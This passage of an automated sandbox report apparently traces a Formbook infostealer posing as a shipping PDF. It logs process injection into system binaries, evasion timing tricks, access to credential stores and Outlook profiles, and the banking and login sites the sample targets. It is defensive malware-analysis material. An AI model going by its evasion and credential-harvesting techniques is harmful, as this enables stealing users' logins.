            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeCode function: 12_2_05335B5F12_2_05335B5F
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeCode function: 12_2_0532D3C912_2_0532D3C9
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exeCode function: 12_2_0532D3CF12_2_0532D3CF
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 14_2_00000221B5F3F7D814_2_00000221B5F3F7D8
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 14_2_00000221B5F403D414_2_00000221B5F403D4
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 14_2_00000221B5F4076C14_2_00000221B5F4076C
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 14_2_00000221B5F402B614_2_00000221B5F402B6
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 14_2_00000221B5F3EA8814_2_00000221B5F3EA88
            Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 14_2_00000221B5F408F214_2_00000221B5F408F2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03675130 appears 36 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 036BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 036AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0362B970 appears 265 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03687E54 appears 89 times
            Source: C:\Windows\SysWOW64\sort.exe | Code function: String function: 0397F290 appears 105 times
            Source: C:\Windows\SysWOW64\sort.exe | Code function: String function: 038EB970 appears 263 times
            Source: C:\Windows\SysWOW64\sort.exe | Code function: String function: 03947E54 appears 89 times
            Source: C:\Windows\SysWOW64\sort.exe | Code function: String function: 0396EA12 appears 84 times
            Source: C:\Windows\SysWOW64\sort.exe | Code function: String function: 03935130 appears 36 times
            Source: shipping notification_pdf.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3145640924.0000000003670000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3145353643.0000000003620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.1552092799.0000000004350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.3146774474.0000000005310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.1548607953.0000000002D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.3135960278.0000000002F70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.3145239455.00000000036B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: AVyNLNHPrma.exe, 0000000C.00000002.3144473243.00000000010D8000.00000004.00000020.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000000.1614812981.00000000010D8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ;.VBp
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@11/7
            Source: C:\Users\user\Desktop\shipping notification_pdf.exe | File created: C:\Users\user~1\AppData\Local\Temp\surmount
            Source: shipping notification_pdf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\shipping notification_pdf.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\shipping notification_pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: sort.exe, 0000000B.00000002.3137911824.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 0000000B.00000003.1802042316.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 0000000B.00000003.1801974564.00000000034C6000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 0000000B.00000002.3137911824.00000000034E6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: shipping notification_pdf.exe | ReversingLabs: Detection: 31%
            Source: C:\Users\user\Desktop\shipping notification_pdf.exe | File read: C:\Users\user\Desktop\shipping notification_pdf.exe
            Source: unknown | Process created: C:\Users\user\Desktop\shipping notification_pdf.exe "C:\Users\user\Desktop\shipping notification_pdf.exe"
            Source: C:\Users\user\Desktop\shipping notification_pdf.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\shipping notification_pdf.exe"
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | Process created: C:\Windows\SysWOW64\sort.exe "C:\Windows\SysWOW64\sort.exe"
            Source: C:\Windows\SysWOW64\sort.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\shipping notification_pdf.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\shipping notification_pdf.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\shipping notification_pdf.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\shipping notification_pdf.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\shipping notification_pdf.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\shipping notification_pdf.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\shipping notification_pdf.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\shipping notification_pdf.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\shipping notification_pdf.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\shipping notification_pdf.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\shipping notification_pdf.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\sort.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\sort.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\sort.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\sort.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\sort.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\sort.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\sort.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\sort.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\sort.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\sort.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\sort.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\sort.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\sort.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\sort.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\sort.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\sort.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\sort.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\sort.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\sort.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\sort.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\sort.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\sort.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\sort.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\shipping notification_pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: C:\Windows\SysWOW64\sort.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: shipping notification_pdf.exe | Static file information: File size 1359839 > 1048576
            Source: Binary string: sort.pdb source: svchost.exe, 00000008.00000003.1508760491.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1549522108.0000000003000000.00000004.00000020.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000002.3141930342.0000000001098000.00000004.00000020.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000003.1829074625.00000000010AB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: AVyNLNHPrma.exe, 0000000A.00000002.3134753679.000000000003E000.00000002.00000001.01000000.00000005.sdmp, AVyNLNHPrma.exe, 0000000C.00000000.1614506571.000000000003E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000008.00000002.1549858763.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1440694217.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1438499265.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, sort.exe, 0000000B.00000003.1549372724.000000000370C000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 0000000B.00000002.3145974902.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, sort.exe, 0000000B.00000003.1541316835.000000000352D000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 0000000B.00000002.3145974902.00000000038C0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: svchost.exe, svchost.exe, 00000008.00000002.1549858763.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1440694217.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1438499265.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, sort.exe, sort.exe, 0000000B.00000003.1549372724.000000000370C000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 0000000B.00000002.3145974902.0000000003A5E000.00000040.00001000.00020000.00000000.sdmp, sort.exe, 0000000B.00000003.1541316835.000000000352D000.00000004.00000020.00020000.00000000.sdmp, sort.exe, 0000000B.00000002.3145974902.00000000038C0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: sort.exe, 0000000B.00000002.3146431327.0000000003EEC000.00000004.10000000.00040000.00000000.sdmp, sort.exe, 0000000B.00000002.3137911824.000000000342D000.00000004.00000020.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000002.3145117742.0000000002EDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1911274268.000000003615C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: sort.pdbGCTL source: svchost.exe, 00000008.00000003.1508760491.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1549522108.0000000003000000.00000004.00000020.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000002.3141930342.0000000001098000.00000004.00000020.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000A.00000003.1829074625.00000000010AB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: sort.exe, 0000000B.00000002.3146431327.0000000003EEC000.00000004.10000000.00040000.00000000.sdmp, sort.exe, 0000000B.00000002.3137911824.000000000342D000.00000004.00000020.00020000.00000000.sdmp, AVyNLNHPrma.exe, 0000000C.00000002.3145117742.0000000002EDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1911274268.000000003615C000.00000004.80000000.00040000.00000000.sdmp
            Source: shipping notification_pdf.exe | Static PE information: real checksum: 0xa961f should be: 0x15b839
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_004019DD push esp; retn D083h 8_2_004019EA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_004180C7 push ebp; ret 8_2_00418091
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_004160F4 push edx; ret 8_2_004160F2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00418084 push ebp; ret 8_2_00418091
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_004160B9 push edx; ret 8_2_004160F2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00407173 push 4AC4F0F0h; ret 8_2_0040719B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00416121 push edx; ret 8_2_004160F2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00417985 push ds; retf 8_2_00417986
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0040A990 push ecx; iretd 8_2_0040A992
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0041E265 push ebp; iretd 8_2_0041E2C6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_004032E0 push eax; ret 8_2_004032E2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00413DF7 push es; ret 8_2_00413DF9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00401DB2 push esp; iretd 8_2_00401DB3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00413DB5 push es; ret 8_2_00413DF9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00401DB5 push esp; iretd 8_2_00401DB3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00401DB5 push ebp; iretd 8_2_00401E31
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0041167E push ebx; ret 8_2_00411690
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_004186B9 push ecx; ret 8_2_004186CF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_00418778 push 9D5E7F8Fh; retf 8_2_0041878A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_0040CFBA push edi; iretd 8_2_0040CFBE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_036309AD push ecx; mov dword ptr [esp], ecx 8_2_036309B6
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_038F09AD push ecx; mov dword ptr [esp], ecx 11_2_038F09B6
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_02F88261 push edx; retf 11_2_02F881C3
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_02F853D6 push ecx; ret 11_2_02F853EC
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_02F7E39B push ebx; ret 11_2_02F7E3AD
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_02F87320 push es; retf 11_2_02F873C5
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_02F91321 push ebp; ret 11_2_02F91322
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_02F8D0FB push esi; ret 11_2_02F8D0FC
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_02F776AD push ecx; iretd 11_2_02F776AF
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_02F846A2 push ds; retf 11_2_02F846A3
            Source: C:\Windows\SysWOW64\sort.exe | Code function: 11_2_02F85495 push 9D5E7F8Fh; retf 11_2_02F854A7
            Source: C:\Users\user\Desktop\shipping notification_pdf.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\sort.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\shipping notification_pdf.exe - API/Special instruction interceptor: Address: 433E43C
            Source: C:\Windows\SysWOW64\sort.exe - API/Special instruction interceptor: Address: 7FFB2CECD324
            Source: C:\Windows\SysWOW64\sort.exe - API/Special instruction interceptor: Address: 7FFB2CECD7E4
            Source: C:\Windows\SysWOW64\sort.exe - API/Special instruction interceptor: Address: 7FFB2CECD944
            Source: C:\Windows\SysWOW64\sort.exe - API/Special instruction interceptor: Address: 7FFB2CECD504
            Source: C:\Windows\SysWOW64\sort.exe - API/Special instruction interceptor: Address: 7FFB2CECD544
            Source: C:\Windows\SysWOW64\sort.exe - API/Special instruction interceptor: Address: 7FFB2CECD1E4
            Source: C:\Windows\SysWOW64\sort.exe - API/Special instruction interceptor: Address: 7FFB2CED0154
            Source: C:\Windows\SysWOW64\sort.exe - API/Special instruction interceptor: Address: 7FFB2CECDA44
            Source: C:\Windows\SysWOW64\svchost.exe - Code function: 8_2_036AD1C0 rdtsc 8_2_036AD1C0
            Source: C:\Windows\SysWOW64\sort.exe - Window / User API: threadDelayed 9836
            Source: C:\Windows\SysWOW64\svchost.exe - API coverage: 0.8 %
            Source: C:\Windows\SysWOW64\sort.exe - API coverage: 3.1 %
            Source: C:\Windows\SysWOW64\sort.exe TID: 3020 - Thread sleep count: 135 > 30
            Source: C:\Windows\SysWOW64\sort.exe TID: 3020 - Thread sleep time: -270000s >= -30000s
            Source: C:\Windows\SysWOW64\sort.exe TID: 3020 - Thread sleep count: 9836 > 30
            Source: C:\Windows\SysWOW64\sort.exe TID: 3020 - Thread sleep time: -19672000s >= -30000s
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe TID: 2040 - Thread sleep time: -50000s >= -30000s
            Source: C:\Program Files (x86)\zGtToEHqrDlmHDbeOzMEbGEhGSBPIGHocRmwQzHZYvHOPdzsmuTJUUeqQxwlMZkLPvKeiIx\AVyNLNHPrma.exe TID: 2040 - Thread sleep time: -33000s >= -30000s
            Source: C:\Windows\SysWOW64\sort.exe - Last function: Thread delayed
            Source: C:\Windows\SysWOW64\sort.exe - Code function: 11_2_02F8C040 FindFirstFileW,FindNextFileW,FindClose 11_2_02F8C040
            Source: 30G910fd.11.dr - Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
            Source: 30G910fd.11.dr - Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
            Source: 30G910fd.11.dr - Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
            Source: 30G910fd.11.dr - Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
            Source: 30G910fd.11.dr - Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
            Source: sort.exe, 0000000B.00000002.3148087625.0000000008205000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: entralVMware20,11696492231
            Source: 30G910fd.11.dr - Binary or memory string: outlook.office.comVMware20,11696492231s
            Source: sort.exe, 0000000B.00000002.3148087625.0000000008205000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: outlook.office.comVMware20,
            Source: 30G910fd.11.dr - Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
            Source: 30G910fd.11.dr - Binary or memory string: AMC password management pageVMware20,11696492231
            Source: sort.exe, 0000000B.00000002.3148087625.0000000008205000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: outlook.office365.comVMware20
            Source: 30G910fd.11.dr - Binary or memory string: interactivebrokers.comVMware20,11696492231
            Source: 30G910fd.11.dr - Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
            Source: 30G910fd.11.dr - Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
            Source: 30G910fd.11.dr - Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
            Source: 30G910fd.11.dr - Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
            Source: 30G910fd.11.dr - Binary or memory string: outlook.office365.comVMware20,11696492231t
            Source: sort.exe, 0000000B.00000002.3148087625.0000000008205000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: kers - non-EU EuropeVMware20,116
            Source: 30G910fd.11.dr - Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
            Source: 30G910fd.11.dr - Binary or memory string: discord.comVMware20,11696492231f
            Source: AVyNLNHPrma.exe, 0000000C.00000002.3144473243.00000000010F0000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$
            Source: sort.exe, 0000000B.00000002.3148087625.0000000008205000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: hdfcbank.comVMware20,11696492231
            Source: sort.exe, 0000000B.00000002.3137911824.000000000342D000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
            Source: sort.exe, 0000000B.00000002.3148087625.0000000008205000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: w.interactivebrokers.comVMware20
            Source: 30G910fd.11.dr - Binary or memory string: global block list test formVMware20,11696492231
            Source: 30G910fd.11.dr - Binary or memory string: dev.azure.comVMware20,11696492231j
            Source: 30G910fd.11.dr - Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
            Source: 30G910fd.11.dr - Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
            Source: 30G910fd.11.dr - Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
            Source: 30G910fd.11.dr - Binary or memory string: bankofamerica.comVMware20,11696492231x
            Source: 30G910fd.11.dr - Binary or memory string: tasks.office.comVMware20,11696492231o
            Source: sort.exe, 0000000B.00000002.3148087625.0000000008205000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: merica.comVMware20,11696492231|
            Source: sort.exe, 0000000B.00000002.3148087625.0000000008205000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: lobal passwords blocklistVMware20,11696492231
            Source: 30G910fd.11.dr - Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
            Source: firefox.exe, 0000000E.00000002.1912870961.00000221B61DC000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 30G910fd.11.dr - Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
            Source: 30G910fd.11.dr - Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
            Source: 30G910fd.11.dr - Binary or memory string: ms.portal.azure.comVMware20,11696492231
            Source: 30G910fd.11.dr - Binary or memory string: turbotax.intuit.comVMware20,11696492231t
            Source: 30G910fd.11.dr - Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
            Source: 30G910fd.11.dr - Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
            Source: 30G910fd.11.dr - Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
